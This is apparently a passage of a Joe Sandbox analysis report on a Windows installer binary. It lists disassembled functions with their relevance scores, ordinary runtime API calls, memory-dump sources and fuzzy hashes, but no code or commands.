                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 431186d866564921a85e1182cf5b32bc6eeceb8ec960d66bf980614036ea3558
                            • Instruction ID: df4ecef0054d3efe40393a66bf978e9116e38afbd2eae3a02dea2d3f3889c4ae
                            • Opcode Fuzzy Hash: 431186d866564921a85e1182cf5b32bc6eeceb8ec960d66bf980614036ea3558
                            • Instruction Fuzzy Hash: 0EE0EC32500108AFCF016F66C91DAAD3F79FF95755B11C864F819C6A21DB3AE992EB80
                            Function 6CC6BEA1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: x=J
                            • API String ID: 3519838083-1497497802
                            • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction ID: 344ee7ae7d77deb5bf70d52d4ed28eaf56fbb1519cb51c29185a9b1a441871cc
                            • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction Fuzzy Hash: 4591C435D011099BCF04EFAAD6D09EDB7B1FF15308F208069E851A7E51FB35998ACB51
                            Function 6CC3A133 Relevance: 3.3, APIs: 2, Instructions: 302COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CC3AFA0
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CC3B7C3
                              • Part of subcall function 6CC3CA69: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CC3B7AC,00000000,?,?,?,6CC3B7AC,?,6CC6853C), ref: 6CC3CAC9
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                            • String ID:
                            • API String ID: 915016180-0
                            • Opcode ID: ebfa1d1a023415bf6484486156b95a229f2e0bcbfcfbb4e907cdb2fa63114ae8
                            • Instruction ID: ad6601e79316f4aec1859fa3600f5ee925b6f309d03afccd15efc84df15978b6
                            • Opcode Fuzzy Hash: ebfa1d1a023415bf6484486156b95a229f2e0bcbfcfbb4e907cdb2fa63114ae8
                            • Instruction Fuzzy Hash: 89B1ED71E08A189FEB14CF65D89169DBBB8FB0A318F20912ED51DE7780E3749645CF90
                            Function 6CC6B972 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @4J$DsL
                            • API String ID: 0-2004129199
                            • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction ID: f5bfdc870fa60912a8baa037dc67155e07bb02789a6420d1599943b676a997f2
                            • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction Fuzzy Hash: 552171377A4D564BD74CCA28EC33EB92680E744305B89527EE94BCB7E1DF5D8800C648
                            Function 6CC8840A Relevance: 2.3, APIs: 1, Instructions: 760COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC8840F
                              • Part of subcall function 6CC89137: __EH_prolog.LIBCMT ref: 6CC8913C
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                            • Instruction ID: 72c4311dccc794379a463d69bd48a5341f73306bec0cf283f99c89c0499395e8
                            • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                            • Instruction Fuzzy Hash: 1F627C71D02259CFDF15CFA4C894BEEBBB5BF44308F1440AAE815ABA80E7749A45CF91
                            Function 6CCE0AD0 Relevance: 1.9, Strings: 1, Instructions: 669COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: YA1
                            • API String ID: 0-613462611
                            • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                            • Instruction ID: 8fa4e4d133d3a5b8a28569ba9768e078e49e33c33c38473048b5c44a3cd6b0df
                            • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                            • Instruction Fuzzy Hash: 014292716093818FD315CF28C49069ABBE2FFDE308F15496DE8D58B742EA71D946CB82
                            Function 6CC73BCA Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aullrem
                            • String ID:
                            • API String ID: 3758378126-0
                            • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction ID: f5a0a5b05aaaa007ee2a40457aec9af575b6ec94df250f656af6351ce3ab570e
                            • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction Fuzzy Hash: F551DA71A092459BD710CF5EC4C06EDFBF6EF79214F18C05EE88897242E27A5D9AC760
                            Function 6CCECE80 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                            • Instruction ID: e3ef4db7294d7cb92e9a581ef0c0122dbe026cc91c81a2cd739de1cf69f8825b
                            • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                            • Instruction Fuzzy Hash: 3C0288316083808BD725CF29C49079EBBE2BFCA318F144A2DE4D597B91E775D946CB82
                            Function 6CC6F7CF Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: (SL
                            • API String ID: 0-669240678
                            • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction ID: 206b5286a6dee8fa8c02e1339c2a6385cdb68f1a60a4d9c5e7c76b6cf9a86bbf
                            • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction Fuzzy Hash: CA519473E208214AD78CCF24DC2177572D2E784311F8BC1B99D8BAB6E6DD78989087D4
                            Function 6CD47A46 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: B
                            • API String ID: 0-1255198513
                            • Opcode ID: 26643807f12313c04aaa413d9f20b4c0588d72bb55b68c80837e514dee027d31
                            • Instruction ID: 21214928cf90f17d4d5673ddad9e60c3b1a701888f4008dc0319ce2e57faf3d5
                            • Opcode Fuzzy Hash: 26643807f12313c04aaa413d9f20b4c0588d72bb55b68c80837e514dee027d31
                            • Instruction Fuzzy Hash: 703126315087518BD324EF28D884AABB3E2FBC4325F60CA3DD89ACBA94E7745415CF41
                            Function 6CCE3020 Relevance: .8, Instructions: 762COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                            • Instruction ID: 56bdea3da509c240f94b34cb4b9327bf1fd97fae6a2f5552256602fad683d502
                            • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                            • Instruction Fuzzy Hash: FE525131204B458BD329CF29C59466AB7E2FF8A308F188A2DD4DAC7B51EB74F449CB41
                            Function 6CCFD930 Relevance: .7, Instructions: 740COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                            • Instruction ID: 29b3d1e89cf71f38bea98b51b1959fcddb4c2d9b44103611285f5c23d5ec1988
                            • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                            • Instruction Fuzzy Hash: C86207B1A093458FC754CF1AC48061AFBF5BFC8744F248A6EE8A587715E770E846CB92
                            Function 6CCE6D50 Relevance: .5, Instructions: 547COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                            • Instruction ID: 404a6f546cf19a79a46e8bcb17cbbeaf64e9a07f9d27017544eee1a5c96426da
                            • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                            • Instruction Fuzzy Hash: DD12AE712097468FC718CF29C49066AFBE2FFCA344F54492DE99687B42EB31E845CB51
                            Function 6CCF7AA0 Relevance: .5, Instructions: 474COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                            • Instruction ID: 2b673d2e5f6b162ff2b0f1fd5c842a56ad14873ed298788e015ec10dddc832ba
                            • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                            • Instruction Fuzzy Hash: 4A020B31A083118FD358CF28C490259BBF2FFC4355F150B2EE4A6D7A54E7749986DB92
                            Function 6CCE2A50 Relevance: .5, Instructions: 453COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                            • Instruction ID: db7efa284c5b7c9652c1b8ee2c2a0672af7eeaca2f255e0479402b728deaee45
                            • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                            • Instruction Fuzzy Hash: B4F1F53260428A8BEB24CF28D8647EEB7E1FBCA314F54453DD889C7B41EB35954AC791
                            Function 6CCF25C0 Relevance: .3, Instructions: 333COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                            • Instruction ID: 8d3f11b47b5fffb10938f7f6157eab23308f06d547d982bcc5e0c317558d5b59
                            • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                            • Instruction Fuzzy Hash: 72D110715047968FD719CF1CC4A8636BBE1FF86304F054ABDDAA28B39AE7349606CB50
                            Function 6CD84F0A Relevance: .3, Instructions: 332COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b1f756ee2fe841902191c907d409ace29a41e7dd29706095e1f65657f94ace09
                            • Instruction ID: faadde5afa5957fd13c8a1caeed3e044e65353b8b752669fef533391b482be28
                            • Opcode Fuzzy Hash: b1f756ee2fe841902191c907d409ace29a41e7dd29706095e1f65657f94ace09
                            • Instruction Fuzzy Hash: EFB1C7366087128BD318DF78D8409FB73E2EBC2320F54863DE196C79D4DB35991A8B81
                            Function 6CCE5580 Relevance: .3, Instructions: 316COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                            • Instruction ID: 26f54a6ce353fad84f119b1c9374289cdc61a65a38ef0ca9f15705b3cae9ba9b
                            • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                            • Instruction Fuzzy Hash: 4FC1A5352047418BC719CF3AD0A0696BBE2EFDE314F148A6DC4CE4BB55EA31A80ECB55
                            Function 6CCE1810 Relevance: .3, Instructions: 296COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                            • Instruction ID: bfd311e38e1b6db179a5d6ae1e8cd5c27fb328e847f78038c57f415fd9cc25bb
                            • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                            • Instruction Fuzzy Hash: F1B1AF31305B458BD324DF7DC890BEAB7E1AF8A308F04452DC5AA87B52FF35A54987A1
                            Function 6CCE4AA0 Relevance: .3, Instructions: 291COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                            • Instruction ID: e1ce39c1c6db4ae1bf6f24aaef9790d74f68e4fef278d4499c29cd8cc3484ca2
                            • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                            • Instruction Fuzzy Hash: D6B1AB756087028BC304DF69C8806ABF7E2FFC9304F14896DE499C7711E771A95ACB95
                            Function 6CCEC9F0 Relevance: .3, Instructions: 287COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                            • Instruction ID: 7350979eb1f2ea5707d8774a43f21a1e26c9e79ebb0a3d30539aedb0d3904cee
                            • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                            • Instruction Fuzzy Hash: 54A1C5726083418FC318DF2DC49069ABFE1BBDA348F544A6DE4D687741E631E94ACB42
                            Function 6CCEC6E0 Relevance: .2, Instructions: 223COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                            • Instruction ID: 490c8dab98bd0ec3808e912335fe8a47f13a0ee2753d605be99c470aa4891b31
                            • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                            • Instruction Fuzzy Hash: BF81B135A047058FC320DF29C180696BBE1FF9E714F28CA6DC5999B711E772E946CB81
                            Function 6CDA3881 Relevance: .2, Instructions: 184COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 009345f38ae626d469f014b0d0cdef2e0b6b81041916f6b4890b19886bbdf896
                            • Instruction ID: 9c5b62cc1f107a985378e6d9fcd0c8012134374dabb7cd56d45d38b686054f1e
                            • Opcode Fuzzy Hash: 009345f38ae626d469f014b0d0cdef2e0b6b81041916f6b4890b19886bbdf896
                            • Instruction Fuzzy Hash: 78518836A126164BC70CDA3CD8515E73392EBC6370B18C73EE59AC79D4EB79940BC600
                            Function 6CC83B66 Relevance: .2, Instructions: 167COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
